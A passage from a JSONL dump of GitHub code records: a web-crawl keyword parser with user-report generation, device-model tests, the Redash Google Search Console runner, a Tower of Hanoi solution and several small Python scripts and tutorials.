info['event_cnt_m_prev'],\n 'heatmap_count': info['hm_page_cnt'],\n 'page_group_count': info['pg_cnt'],\n 'conversion_count': info['cv_cnt'],\n 'login_last_30days': info['login_cnt_30d']\n }\n\n return None\n\n def get_primary_domain(self, site_id):\n if site_id in self.ref_site_status.keys():\n return self.ref_site_status[site_id]\n\n return 'N'\n\n def get_login_info(self, user_id):\n login_list = self.__get_login_time_list(user_id)\n if login_list is None:\n return 'N', 'N'\n\n login_list.sort()\n login_list = [int(one/1000) for one in login_list]\n new_login_list = list(map(self.__format_login_time, login_list))\n\n return new_login_list[-1], len(new_login_list)\n\n def __format_login_time(self, login_time):\n l_time = time.localtime(login_time)\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", l_time)\n\n def __get_login_time_list(self, user_id):\n if user_id in self.user_login_log.keys():\n return self.user_login_log[user_id]\n\n return None\n\n\n@myutil.singleton\nclass ParseSpiderData(object):\n nltk_pattern = r'''(?x) # set flag to allow verbose regexps\n (?:[A-Z]\\.)+ # abbreviations, e.g. U.S.A.\n |\\d+(?:\\.\\d+)?%? # numbers, incl. currency and percentages\n |\\w+(?:[-']\\w+)* # words w/ optional internal hyphens/apostrophe\n |\\.\\.\\. # ellipsis\n |(?:[.,;\"'?():-_`]) # special characters with meanings\n '''\n prog_list = []\n\n def __init__(self):\n for key_word, pattern in SPCE_KW_ARR:\n prog = re.compile(pattern, flags=re.I)\n self.prog_list.append((key_word, prog))\n\n self.parse_spider_dict = {}\n self.__load_parse()\n self.parse()\n\n def parse(self):\n domain_dirs_path = os.path.join('.', 'data', '*', '*')\n domain_dirs = glob.glob(domain_dirs_path)\n for data_path in domain_dirs:\n \n basename = os.path.basename(data_path)\n if self.__is_cache_parse(basename):\n logging.info('ParseSpiderData cache: %s', data_path)\n continue\n \n logging.info('ParseSpiderData parse: %s', data_path)\n\n email_suffix = basename\n homepage = ''\n sum_kw_counter = Counter({})\n\n files_path = os.path.join(data_path, '**', '*.json')\n json_files = glob.glob(files_path, recursive=True)\n for json_file in json_files:\n with open(json_file, 'r', encoding='utf-8') as f:\n try:\n data_json = json.loads(f.read())\n\n json_email_suffix = data_json['domain']\n\n # 从首页中获取域名、url信息\n if data_json['phrase'] == 'first_page':\n email_suffix = json_email_suffix\n homepage = data_json['url']\n\n # 排除不是本域名的url\n if self.__is_cache_parse(json_email_suffix):\n continue\n\n if json_email_suffix not in data_json['url']:\n continue\n\n _, sum_kw_counter = self.__do_parse(\n data_json, sum_kw_counter)\n\n except Exception as _e:\n continue\n\n total_kw_hits = 0\n distinct_kw_hits = 0\n sum_kw_dict = dict(sum_kw_counter)\n for key in sum_kw_dict:\n count = sum_kw_dict[key]\n total_kw_hits += count\n distinct_kw_hits += 1\n\n sum_kw_dict['total_kw_hits'] = total_kw_hits\n sum_kw_dict['distinct_kw_hits'] = distinct_kw_hits\n\n if len(email_suffix) > 0:\n sum_kw_dict['email_suffix'] = email_suffix\n sum_kw_dict['homepage'] = homepage\n sum_kw_dict = self.__fill_default_value(sum_kw_dict)\n self.parse_spider_dict[email_suffix] = sum_kw_dict\n self.__save_parse(sum_kw_dict)\n\n def __save_parse(self, sum_kw_dict):\n save_file = os.path.join('record', 'parse_spider.json')\n with open(save_file, 'a', newline='', encoding='utf-8') as f:\n json.dump(sum_kw_dict, f, ensure_ascii=False)\n f.write(os.linesep)\n\n def __load_parse(self):\n save_file = os.path.join('record', 'parse_spider.json')\n if not os.path.exists(save_file):\n with open(save_file, 'w', encoding='utf-8') as f:\n pass\n\n with open(save_file, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n sum_kw_dict = json.loads(line)\n email_suffix = sum_kw_dict['email_suffix']\n self.parse_spider_dict[email_suffix] = sum_kw_dict\n\n def __is_cache_parse(self, email_suffix):\n if email_suffix in self.parse_spider_dict.keys():\n return True\n\n return False\n\n def __do_parse(self, data_json, counter_summary):\n counter_detail = Counter({})\n spec_counter_detail = Counter({})\n text = data_json['text']\n soup = bs4.BeautifulSoup(text, 'lxml')\n tokens = [text.strip().lower() for text in soup.stripped_strings]\n for item in tokens:\n if self.__filter_text(item) == True:\n continue\n\n # 一些特殊字符的命中检查\n spec_hits = self.__get_hits(item)\n if len(spec_hits) > 0:\n spec_counter_detail = spec_counter_detail + Counter(spec_hits)\n\n words = nltk.regexp_tokenize(item, self.nltk_pattern)\n for word in words:\n if len(word) < 2:\n continue\n\n hits = self.__check_hit(word)\n if len(hits) > 0:\n counter_hits = Counter(hits)\n counter_detail = counter_detail + counter_hits\n counter_summary = counter_summary + counter_hits\n\n return counter_detail + spec_counter_detail, counter_summary + spec_counter_detail\n\n def __get_hits(self, item):\n hit_dict = {}\n for (key_word, prog) in self.prog_list:\n hits = prog.findall(item)\n if len(hits) > 0:\n hit_dict[key_word] = len(hits)\n\n return hit_dict\n\n def __filter_text(self, text):\n if len(text) < 2:\n return True\n\n # 去掉注释\n if text.startswith(r'<!--') and text.endswith(r'-->'):\n return True\n # 去掉注释\n if text.startswith(r'/*') and text.endswith(r'*/'):\n return True\n\n # 去掉 html 开头的text\n if text.startswith((\n r'html ', r'function', r'(function', r'$(function'\n )):\n return True\n\n return False\n\n def __check_hit(self, word):\n hit_dict = {}\n\n # 数字不进行匹配\n if word.isnumeric():\n return hit_dict\n\n # 英文字母必须完全匹配\n if word.encode('utf-8').isalpha():\n if word in KW_ARR:\n hit_dict[word] = 1\n return hit_dict\n else:\n return hit_dict\n\n # 模糊匹配\n for key_word in KW_ARR:\n count = word.count(key_word)\n if count > 0:\n hit_dict[key_word] = count\n\n return hit_dict\n\n def __fill_default_value(self, info_dict):\n for key_word in ALL_KW_ARR:\n if key_word not in info_dict.keys():\n info_dict[key_word] = 0\n return info_dict\n\n def get_info(self, domain):\n if domain in self.parse_spider_dict.keys():\n return self.parse_spider_dict[domain]\n\n return None\n\n\ndef parse_detail():\n \n # fix bug: miss homepage\n domain2url = {}\n with open(myutil.DETECT_URL, 'r', newline='', encoding='utf-8') as f:\n reader = csv.DictReader(f)\n for row in reader:\n domain2url[row['domain']] = row['url'].strip().rstrip(r'/')\n # end fix bug\n\n detail_file = HandleStore().handle_file_name(DETAIL_FILE)\n HandleStore().write_detail_head(detail_file)\n\n serial_line = 0\n user_list = LoadSQLData().get_user_detail()\n for user_row in user_list:\n email = user_row['email']\n\n serial_line += 1\n logging.info(\n 'parse_data: serial num %d, email %s', serial_line, email\n )\n\n domain = myutil.get_domain(email)\n kw_info = ParseSpiderData().get_info(domain)\n if kw_info is None:\n continue\n \n # fix bug: miss homepage\n if len(kw_info['homepage']) == 0:\n kw_info['homepage'] = domain2url[domain] \n\n profile_domains = LoadSQLData().get_profile_domains(email)\n profile_owner = LoadSQLData().is_profile_owner(int(user_row['uid']))\n\n user_db_info = {\n 'email': email,\n 'company': user_row['account_company_name'],\n 'user_name': user_row['account_name'],\n 'phone': user_row['telephone'],\n 'profile_domains': profile_domains,\n 'profile_owner': profile_owner\n }\n\n dd_info = LoadSQLData().get_dd_info(email)\n if dd_info is None:\n dd_info = {}\n\n detail_row = dict(**kw_info, **user_db_info, **dd_info)\n HandleStore().write_detail_row(detail_file, detail_row)\n\n\ndef parse_summary():\n summary_row_list = []\n emails_merge_dict = {}\n\n detail_file = os.path.join('record', DETAIL_FILE)\n\n # 统计合并相同后缀的email\n with open(detail_file, 'r', encoding='utf-8-sig') as f:\n reader = csv.DictReader(f)\n for detail_row in reader:\n email_suffix = detail_row['email_suffix']\n if email_suffix in emails_merge_dict.keys():\n emails_merge_dict[email_suffix] += 1\n else:\n emails_merge_dict[email_suffix] = 1\n\n merge_email_suffix_list = []\n with open(detail_file, 'r', encoding='utf-8-sig') as f:\n reader = csv.DictReader(f)\n for detail_row in reader:\n email_suffix = detail_row['email_suffix']\n if email_suffix in merge_email_suffix_list:\n continue\n\n merge_email_suffix_list.append(email_suffix)\n\n emails_merge_count = 1\n if email_suffix in emails_merge_dict.keys():\n emails_merge_count = emails_merge_dict[email_suffix]\n\n ext_summary = {\n 'email_suffix': email_suffix,\n 'homepage': detail_row['homepage'],\n 'email_count': emails_merge_count,\n 'company': detail_row['company'],\n 'last_month_pv': detail_row['last_month_pv'],\n 'last_month_events': detail_row['last_month_events'],\n 'heatmap_count': detail_row['heatmap_count'],\n 'page_group_count': detail_row['page_group_count'],\n 'conversion_count': detail_row['conversion_count'],\n 'login_last_30days': detail_row['login_last_30days'],\n 'total_kw_hits': detail_row['total_kw_hits'],\n 'distinct_kw_hits': detail_row['distinct_kw_hits']\n }\n kw_summary = {}\n for kw in ALL_KW_ARR:\n kw_summary[kw] = detail_row[kw]\n\n summary_row = dict(**ext_summary, **kw_summary)\n summary_row_list.append(summary_row)\n\n summary_file = HandleStore().handle_file_name(SUMMARY_FILE)\n HandleStore().write_summary_head(summary_file)\n for summary_row in summary_row_list:\n HandleStore().write_summary_row(summary_file, summary_row)\n\n\ndef help():\n print('%s [--fetch | --parse | --summary]' % sys.argv[0])\n\n\nsys.excepthook = my_excepthook\n\nif __name__ == '__main__':\n\n # 初始化log配置\n init_log_config()\n logging.info(\"=================================================\")\n\n try:\n cmd = '--fetch'\n if len(sys.argv) > 1:\n cmd = sys.argv[1]\n\n if cmd == '--fetch':\n # 提取web信息,存储在本地磁盘中\n spider_data()\n elif cmd == '--detail':\n # 解析每个web的详细信息,存储在对应的csv文件中\n parse_detail()\n elif cmd == '--summary':\n # 将所有的web信息进行汇总\n parse_summary()\n else:\n # 输出帮助信息\n help()\n\n # opts, _args = getopt.getopt(\n # sys.argv[1:],\n # \"h\",\n # [\"help\", \"fetch\", \"parse\", \"summary\"]\n # )\n\n # if len(opts) == 0:\n # help()\n # raise ArgsException('no args')\n\n # for opt, arg in opts:\n # if opt in ('-h', '--help'):\n # # 输出帮助信息\n # help()\n # elif opt == '--fetch':\n # # 提取web信息,存储在本地磁盘中\n # parse_email()\n # elif opt == '--parse':\n # # 解析每个web的详细信息,存储在对应的csv文件中\n # parse_data()\n # elif opt == '--summary':\n # # 将所有的web信息进行汇总\n # collect_summary()\n\n except getopt.GetoptError as e:\n logging.error(e)\n\n except Exception as e:\n logging.exception('exception happened')\n\n finally:\n logging.info(\"run over !!! ~~~~~~~~~~~~~~~~~~~~~\")\n","repo_name":"lyx003288/python","sub_path":"0004.web_parse/tutorial/parse_register.py","file_name":"parse_register.py","file_ext":"py","file_size_in_byte":24709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15185318758","text":"import pytest\n\nfrom pyecoforest.exceptions import EcoforestError\nfrom pyecoforest.models.device import Alarm, Device, OperationMode, State\n\n\ndef get_api_data():\n return {\n \"status\": {\n \"on_off\": \"0\",\n \"estado\": \"0\",\n \"consigna_potencia\": \"6\",\n \"consigna_temperatura\": \"22\",\n \"temperatura\": \"24.5\",\n \"modo_operacion\": \"0\",\n },\n \"stats\": {\n \"Me\": \"model-version\",\n \"Vs\": \"firmware-version\",\n \"Ns\": \"serial-number\",\n \"Tp\": \"33.5\",\n \"Th\": \"36.5\",\n \"Tn\": \"23.5\",\n \"Da\": \"002\",\n \"Nh\": \"000006826\",\n \"Ne\": \"001152\",\n \"Pn\": \"0.0\",\n \"Pf\": \"0.0\",\n \"Es\": \"0\",\n \"Ex\": \"0.0\",\n \"Ni\": \"0\",\n \"Co\": \"0.0\",\n },\n \"alarms\": {\"get_alarmas\": \"A099\"},\n }\n\n\ndef test_operation_mode_build():\n assert OperationMode.build(\"0\") == OperationMode.POWER\n assert OperationMode.build(\"1\") == OperationMode.TEMPERATURE\n assert OperationMode.build(\"2\") == OperationMode.EMERGENCY\n with pytest.raises(EcoforestError) as error:\n OperationMode.build(\"3\")\n assert str(error.value) == \"The operation mode 3 is not a valid operation!\"\n\n\ndef test_state_build():\n assert State.build(\"0\") == State.OFF\n for i in [*range(1, 5), 10]:\n assert State.build(i) == State.STARTING\n for i in range(5, 7):\n assert State.build(i) == State.PRE_HEATING\n assert State.build(\"7\") == State.ON\n for i in [8, 11, -3]:\n assert State.build(i) == State.SHUTTING_DOWN\n assert State.build(\"-20\") == State.STAND_BY\n assert State.build(\"-4\") == State.ALARM\n with pytest.raises(EcoforestError) as error:\n State.build(\"9\")\n assert str(error.value) == \"The state 9 is not a valid state!\"\n\n\ndef test_alarm_build():\n for i in [\"A001\", \"A002\"]:\n assert Alarm.build(i) == Alarm.AIR_DEPRESSION\n assert Alarm.build(\"A012\") == Alarm.CPU_OVERHEATING\n assert Alarm.build(\"A099\") == Alarm.PELLETS\n assert Alarm.build(\"N\") is None\n assert Alarm.build(\"A100\") == Alarm.UNKNOWN\n\n\ndef test_device_build():\n assert Device.build(get_api_data()) == Device(\n is_supported=False,\n model=\"model-version\",\n model_name=\"Cordoba glass\",\n firmware=\"firmware-version\",\n serial_number=\"serial-number\",\n operation_mode=OperationMode.POWER,\n on=False,\n state=State.OFF,\n power=6,\n temperature=22,\n alarm=Alarm.PELLETS,\n alarm_code=\"A099\",\n environment_temperature=24.5,\n cpu_temperature=33.5,\n gas_temperature=36.5,\n ntc_temperature=23.5,\n depression=2,\n working_hours=6826,\n ignitions=1152,\n live_pulse=0.0,\n pulse_offset=0.0,\n working_state=0,\n extractor=0,\n working_level=0,\n convecto_air_flow=0.0,\n )\n\n\ndef test_device_build_with_supportted_device():\n data = get_api_data()\n data[\"stats\"][\"Me\"] = \"CC2014_v2\"\n assert Device.build(data).is_supported is True\n","repo_name":"pjanuario/pyecoforest","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39090848418","text":"import spi\nimport numpy as np\n\n\ndef test_gamma_out():\n\n SPI = spi.SPI()\n rainfall_data = np.genfromtxt('data/rainfall_test2.csv', delimiter=',')\n SPI.set_rolling_window_params(span=10, window_type='boxcar', center=False)\n SPI.set_distribution_params(dist_type='gam')\n result = SPI.calculate(rainfall_data, starting_month=1)\n assert np.round(result[-1][0], 4) == np.round(-0.09562831, 4)\n\ntest_gamma_out()\n","repo_name":"anind99/SPI-CALC","sub_path":"test_spi.py","file_name":"test_spi.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"1218723220","text":"\"\"\"\n此模块提供了用于类型提示的定义。\n\"\"\"\n\nfrom typing import TYPE_CHECKING, Union, Dict, Any, List\n\nif TYPE_CHECKING:\n from .message import Message, MessageSegment\n\n__all__ = [\n 'Message_T',\n]\n\nMessage_T = Union[str, Dict[str, Any], List[Dict[str, Any]], 'MessageSegment',\n 'Message']\n","repo_name":"nonebot/aiocqhttp","sub_path":"aiocqhttp/typing.py","file_name":"typing.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"94"} +{"seq_id":"74114277109","text":"#!/usr/bin/ python3\n\nfrom time import sleep\nfrom random import choice, randint\n\nfrom ev3dev.auto import *\n\nimport time\n\nmuxC2port = LegoPort(\"in1:i2c81:mux2\")\nmuxC2port.set_device=\"lego-ev3-color\"\nsleep(1) # need to wait for sensors to be loaded. 0.5 seconds is not enough.\n\ncs= ColorSensor(\"in1:i2c81:mux2\");\t\tassert cs.connected\n\ncs.mode = 'COL-REFLECT'\n\n\nprint(\"Started\")\n\nmeanValue = cs.value()\n\nwhile True:\n meanValue = (meanValue+cs.value())/2\n print(meanValue)\n print('\\n')\n print(cs.value())\n sleep(1)\n","repo_name":"AlexandreLin888/Isep_cruise_control","sub_path":"sensorTest.py","file_name":"sensorTest.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"42129717206","text":"import pandas as pd\nfrom bokeh.plotting import figure\nfrom bokeh.transform import linear_cmap\n\ndf = pd.read_csv(\"data/movies.csv\", parse_dates=[\"Release Date\"])\ndf[\"Release Date\"] = df[\"Release Date\"].dt.year\ndf2 = df.groupby(\"Release Date\")[\"Worldwide Gross\"].sum().reset_index()\n\ndf2[\"y\"] = 1\n\np = figure()\n\np.vbar(\n x=\"Release Date\",\n top=\"y\",\n width=0.5,\n color=linear_cmap(\n \"Worldwide Gross\",\n \"Viridis256\",\n df2[\"Worldwide Gross\"].min(),\n df2[\"Worldwide Gross\"].max(),\n ),\n source=df2,\n)\n","repo_name":"notascope/notascope","sub_path":"galleries/movies/bokeh/stripes.py","file_name":"stripes.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"72647864949","text":"import logging\nfrom base64 import b64decode\nfrom datetime import datetime\n\nfrom redash.query_runner import (\n TYPE_DATE,\n TYPE_DATETIME,\n TYPE_FLOAT,\n TYPE_INTEGER,\n TYPE_STRING,\n BaseSQLQueryRunner,\n register,\n)\nfrom redash.utils import json_dumps, json_loads\n\nlogger = logging.getLogger(__name__)\n\ntry:\n import google.auth\n from apiclient.discovery import build\n from apiclient.errors import HttpError\n from google.oauth2.service_account import Credentials\n\n enabled = True\nexcept ImportError:\n enabled = False\n\n\ntypes_conv = dict(\n STRING=TYPE_STRING,\n INTEGER=TYPE_INTEGER,\n FLOAT=TYPE_FLOAT,\n DATE=TYPE_DATE,\n DATETIME=TYPE_DATETIME,\n)\n\n\ndef parse_ga_response(response, dimensions):\n columns = []\n\n for item in dimensions:\n if item == \"date\":\n data_type = \"date\"\n else:\n data_type = \"string\"\n columns.append(\n {\n \"name\": item,\n \"friendly_name\": item,\n \"type\": data_type,\n }\n )\n\n default_items = [\"clicks\", \"impressions\", \"ctr\", \"position\"]\n for item in default_items:\n columns.append({\"name\": item, \"friendly_name\": item, \"type\": \"number\"})\n\n rows = []\n for r in response.get(\"rows\", []):\n d = {}\n for k, value in r.items():\n if k == \"keys\":\n for index, val in enumerate(value):\n column_name = columns[index][\"name\"]\n column_type = columns[index][\"type\"]\n val = get_formatted_value(column_type, val)\n d[column_name] = val\n else:\n column_name = k\n column_type = [col for col in columns if col[\"name\"] == column_name][0][\"type\"]\n value = get_formatted_value(column_type, value)\n d[column_name] = value\n rows.append(d)\n\n return {\"columns\": columns, \"rows\": rows}\n\n\ndef get_formatted_value(column_type, value):\n if column_type == \"number\":\n value = round(value, 2)\n elif column_type == TYPE_DATE:\n value = datetime.strptime(value, \"%Y-%m-%d\")\n elif column_type == TYPE_DATETIME:\n if len(value) == 10:\n value = datetime.strptime(value, \"%Y%m%d%H\")\n elif len(value) == 12:\n value = datetime.strptime(value, \"%Y%m%d%H%M\")\n else:\n raise Exception(\"Unknown date/time format in results: '{}'\".format(value))\n return value\n\n\nclass GoogleSearchConsole(BaseSQLQueryRunner):\n should_annotate_query = False\n\n @classmethod\n def type(cls):\n return \"google_search_console\"\n\n @classmethod\n def name(cls):\n return \"Google Search Console\"\n\n @classmethod\n def enabled(cls):\n return enabled\n\n @classmethod\n def configuration_schema(cls):\n return {\n \"type\": \"object\",\n \"properties\": {\n \"siteURL\": {\"type\": \"string\", \"title\": \"Site URL\"},\n \"jsonKeyFile\": {\"type\": \"string\", \"title\": \"JSON Key File (ADC is used if omitted)\"},\n },\n \"required\": [],\n \"secret\": [\"jsonKeyFile\"],\n }\n\n def __init__(self, configuration):\n super(GoogleSearchConsole, self).__init__(configuration)\n self.syntax = \"json\"\n\n def _get_search_service(self):\n scopes = [\"https://www.googleapis.com/auth/webmasters.readonly\"]\n\n try:\n key = json_loads(b64decode(self.configuration[\"jsonKeyFile\"]))\n creds = Credentials.from_service_account_info(key, scopes=scopes)\n except KeyError:\n creds = google.auth.default(scopes=scopes)[0]\n\n return build(\"searchconsole\", \"v1\", credentials=creds)\n\n def test_connection(self):\n try:\n service = self._get_search_service()\n service.sites().list().execute()\n except HttpError as e:\n # Make sure we return a more readable error to the end user\n raise Exception(e._get_reason())\n\n def run_query(self, query, user):\n logger.debug(\"Search Analytics is about to execute query: %s\", query)\n params = json_loads(query)\n site_url = self.configuration[\"siteURL\"]\n api = self._get_search_service()\n\n if len(params) > 0:\n try:\n response = api.searchanalytics().query(siteUrl=site_url, body=params).execute()\n data = parse_ga_response(response, params[\"dimensions\"])\n error = None\n json_data = json_dumps(data)\n except HttpError as e:\n # Make sure we return a more readable error to the end user\n error = e._get_reason()\n json_data = None\n else:\n error = \"Wrong query format.\"\n json_data = None\n return json_data, error\n\n\nregister(GoogleSearchConsole)\n","repo_name":"getredash/redash","sub_path":"redash/query_runner/google_search_console.py","file_name":"google_search_console.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":24135,"dataset":"github-code","pt":"94"} +{"seq_id":"40146442212","text":"# Daniel Makarov\n# Investment Calculator\n# Date: October 25 2021\n\nwhile True:\n try:\n principal = float(input(\"Enter initial amount: \"))\n #print(\"Inital Amount:\", principal)\n break\n except:\n print(\"Something seems wrong with your initial ammount. Please try again\")\n\nwhile True:\n try:\n interest_rate = float(input(\"Enter interest rate: \"))\n #print(\"Interest rate:\", interest_rate)\n break\n except:\n print(\"Something seems wrong with your input. Please try again\")\n\nwhile True:\n try:\n years = int(input(\"Please input the number of years: \"))\n #print(\"Input number of years:\", years)\n break\n except:\n print(\"Something seems wrong with your input of years. Please try again\")\n\nyears += 1\n\n\n# Outputs a table for the compound interest over a set of years\nfor number_of_years in range(1, years):\n principal = principal * (1 + interest_rate)\n #print(\"Number:\", number_of_years, \"Total:\", principal)\n\n # Rounds amount to 2 decimals\n principal_number = \"{:.2f}\".format(principal)\n print(number_of_years, principal_number)","repo_name":"daniel-makarov/Grade-12-Python","sub_path":"L2_Div_II/Investment_Calculator.py","file_name":"Investment_Calculator.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18660002515","text":"# -*- coding: utf-8 -*-\n\n\nimport datetime\nfrom decimal import Decimal\n\nimport times\nfrom icalendar import Calendar\n\nfrom .html import html # NOQA\n\n\ndef ical(text):\n \"\"\"Takes text and returns iCalendar data structure.\"\"\"\n return Calendar.from_ical(text)\n\n\ndef price(value):\n \"\"\"Decimal number factory with some initial value polishing.\"\"\"\n value = unicode(value)\n value = value.replace(',', '.')\n value = value.replace(u'Kč', '')\n return Decimal(value.strip())\n\n\ndef date_time_year(date, time, year=None, tz='Europe/Prague'):\n \"\"\"Parses strings representating parts of datetime and combines them\n together. Resulting datetime is in UTC.\n \"\"\"\n dt_string = u'{date} {time} {year}'.format(\n date=date,\n time=time,\n year=year or times.now().year,\n )\n possible_formats = (\n '%d. %m. %H:%M %Y',\n '%d. %m. %H.%M %Y',\n )\n dt = None\n for format in possible_formats:\n try:\n dt = datetime.datetime.strptime(dt_string, format)\n except ValueError:\n pass\n else:\n break\n if dt:\n return times.to_universal(dt, tz)\n else:\n raise ValueError(dt_string)\n","repo_name":"volmutJ/zitkino.cz","sub_path":"zitkino/parsers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"21457513878","text":"import functools\nfrom typing import List\n\nfrom test_framework import generic_test\nfrom test_framework.test_failure import TestFailure\nfrom test_framework.test_utils import enable_executor_hook\n\n\"\"\"\nhttps://www.mathsisfun.com/games/towerofhanoi.html\nThe only way to solve the puzzle was to build interim towers on the different pegs\nou start at the bottom, not the top! Here's how it works. If all the disks are on Peg A at the left, and you need to move them all to Peg C on the right, then you need to move the bottom disk, the largest one, to Peg C. Obviously.\nOnly way you can release nth disk is by building a n-1 disk tower on the empty area.\n\nTo do that, you need to build an interim tower on Peg B with the next largest disk at the bottom. And to do that, you need to build an interim tower on Peg C with the next largest disk.\n\naWESOME EXPLANATION HERE: https://www.youtube.com/watch?v=boS4N1_TLBk&ab_channel=FlorianLudewig\nTowers of Hanoi: In the classic problem of the Towers of Hanoi, you have 3 towers and N disks of different sizes which can slide onto any tower. The puzzle starts with disks sorted in ascending order of size from top to bottom (i.e., each disk sits on top of an even larger one).\nTime: O(2^n)\n\nAnother https://blog.tjd.phlegethon.org/post/107154349862/technical-interviews-and-the-towers-of-hanoi\nThe largest disk moves exactly once, to the left (wrapping around). The second-largest disk moves twice, both times to the right, which matches the algorithm: it moves right to allow the largest disk to move left, and then right again to land on top of it. The third-largest disk moves four times, to the left each time, and the pattern continues for bigger towers. So we know two things: each disk has a preferred direction, and the full solution for N disks has (1 + 2 + ... + 2^(N-1)) == (2^N) - 1 total moves. The iterative algorithm looks like this:\n\ndefine hanoi(N):\n repeat 2^N - 1 times:\n move the largest disk that can go in its preferred direction\n\nYou have the following constraints:\n\n(1) Only one disk can be moved at a time.\n(2) A disk is slid off the top of one tower onto another tower.\n(3) A disk cannot be placed on top of a smaller disk. Write a program to move the disks from the first tower to the last using Stacks.\n\nThe pattern here is :\n - Shift 'n-1' disks from 'origin' to 'buffer', using destination.\n - Shift last disk from 'origin' to 'destination'.\n - Shift 'n-1' disks from 'buffer' to 'destination', using origin.\n\nmoveDisks(int n, Tower origin, Tower destination, Tower buffer) { //places fixed remember\n\n/* Base case */\nif (n <= 0) return;\n\n/* move top n - 1 disks from origin to buffer, using destination as a buffer. */\nmoveDisks(n - 1, origin, buffer, destination);\n\n/* move top from origin to destination\nmoveTop(origin, destination);\n\n/* move top n - 1 disks from buffer to destination, using origin as a buffer. */\n\nmoveDisks(n - 1, buffer, destination, origin);\n}\n\"\"\"\n\nNUM_PEGS = 3 #number of towers\n#ring means those individual disks\n\ndef compute_tower_hanoi(num_rings: int) -> List[List[int]]:\n def compute_tower_hanoi_steps(num_rings_to_move, from_peg, to_peg,\n use_peg):# origin, destination, buffer\n if num_rings_to_move > 0:\n compute_tower_hanoi_steps(num_rings_to_move - 1, from_peg, use_peg,\n to_peg)#move n - 1 disk to buffer using destination \n #this the disk leaving 'from' tower get added to 'destination' tower\n # pegs[to_peg].append(pegs[from_peg].pop())\n result.append([from_peg, to_peg])\n compute_tower_hanoi_steps(num_rings_to_move - 1, use_peg, to_peg,\n from_peg)# move 'n-1' disks from 'buffer' to 'destination', using origin\n\n # Initialize pegs.\n result: List[List[int]] = []\n #initializing towers\n # pegs = [list(reversed(range(1, num_rings + 1)))\n # ] + [[] for _ in range(1, NUM_PEGS)]\n #same as above\n # pegs = [list(reversed(range(1, num_rings + 1)))] + [[] for _ in range(NUM_PEGS - 1)] \n # print(pegs)\n compute_tower_hanoi_steps(num_rings, 0, 2, 1) #i changed the destination to 3 (index 2), earlier it was middle (2)\n return result\n\n# compute_tower_hanoi(3)\n\n#more simple version\n# https://www.youtube.com/watch?v=rf6uf3jNjbo&ab_channel=Reducible\ndef compute_tower_hanyoi(num_rings: int) -> List[List[int]]:\n def hanoi(n, start, end):\n if n == 1:#lets imagine if there is only one, you move it directly to destination\n result.append([start, end])\n else:\n #using 3 here, since 0 + 1 + 2 = 3, video shows 6 , since 1 + 2 + 3\n other = 3 - (start + end)#method of finding the auxiliary/buffer rod at any given time in the recursion\n #above formula find which rod is available for next free legal move\n hanoi(n - 1, start, other)#first move to buffer, you can imagine this step for total disk ==2\n result.append([start, end])#move\n hanoi( n - 1, other, end)\n result: List[List[int]] = []\n hanoi(num_rings, 0, 2)\n return result\ncompute_tower_hanoi(2)\n\n\n\n\n@enable_executor_hook\ndef compute_tower_hanoi_wrapper(executor, num_rings):\n pegs = [list(reversed(range(1, num_rings + 1)))\n ] + [[] for _ in range(1, NUM_PEGS)]\n\n result = executor.run(functools.partial(compute_tower_hanoi, num_rings))\n\n for from_peg, to_peg in result:\n if pegs[to_peg] and pegs[from_peg][-1] >= pegs[to_peg][-1]:\n raise TestFailure('Illegal move from {} to {}'.format(\n pegs[from_peg][-1], pegs[to_peg][-1]))\n pegs[to_peg].append(pegs[from_peg].pop())\n expected_pegs1 = [[], [], list(reversed(range(1, num_rings + 1)))]\n expected_pegs2 = [[], list(reversed(range(1, num_rings + 1))), []]\n if pegs not in (expected_pegs1, expected_pegs2):\n raise TestFailure('Pegs doesn\\'t place in the right configuration')\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('15-01-hanoi.py', 'hanoi.tsv',\n compute_tower_hanoi_wrapper))\n","repo_name":"jayantsolanki/EPIJudgePython","sub_path":"epi_judge_python/15-01-hanoi.py","file_name":"15-01-hanoi.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24911570718","text":"import sys\n\nf = sys.stdin.read().splitlines()\n\nword_dict = {'Y': 'e', 'e': 's', 's': 'Y'}\n\nfor curr_str in f[1:]:\n if not set(curr_str).issubset({'Y', 'e', 's'}):\n print(\"NO\")\n continue\n\n found = True\n for i, char in enumerate(curr_str[1:]):\n if word_dict[curr_str[i]] != char:\n found = False\n break\n\n if found:\n print(\"YES\")\n else:\n print(\"NO\")\n","repo_name":"JJModern/coding_questions","sub_path":"yesyes.py","file_name":"yesyes.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22384092446","text":"# filter 对可迭代对象进行过滤,得到的是filter对象\n# Python2的时候是内置函数,Python3修改成了一个内置类\nages = [12, 3, 4, 22, 34, 53, 18]\n# filter 可以给定两个参数,第一个参数是函数,第二个参数是可迭代对象\n\n# <filter object at 0x000002967A1C8910>\n# x 是一个filter类型的对象\nx = filter(lambda ele: ele > 18, ages)\nprint(x)\n\n# for i in x:\n# print(i)\n# 可迭代对象转换成为列表\nadult = 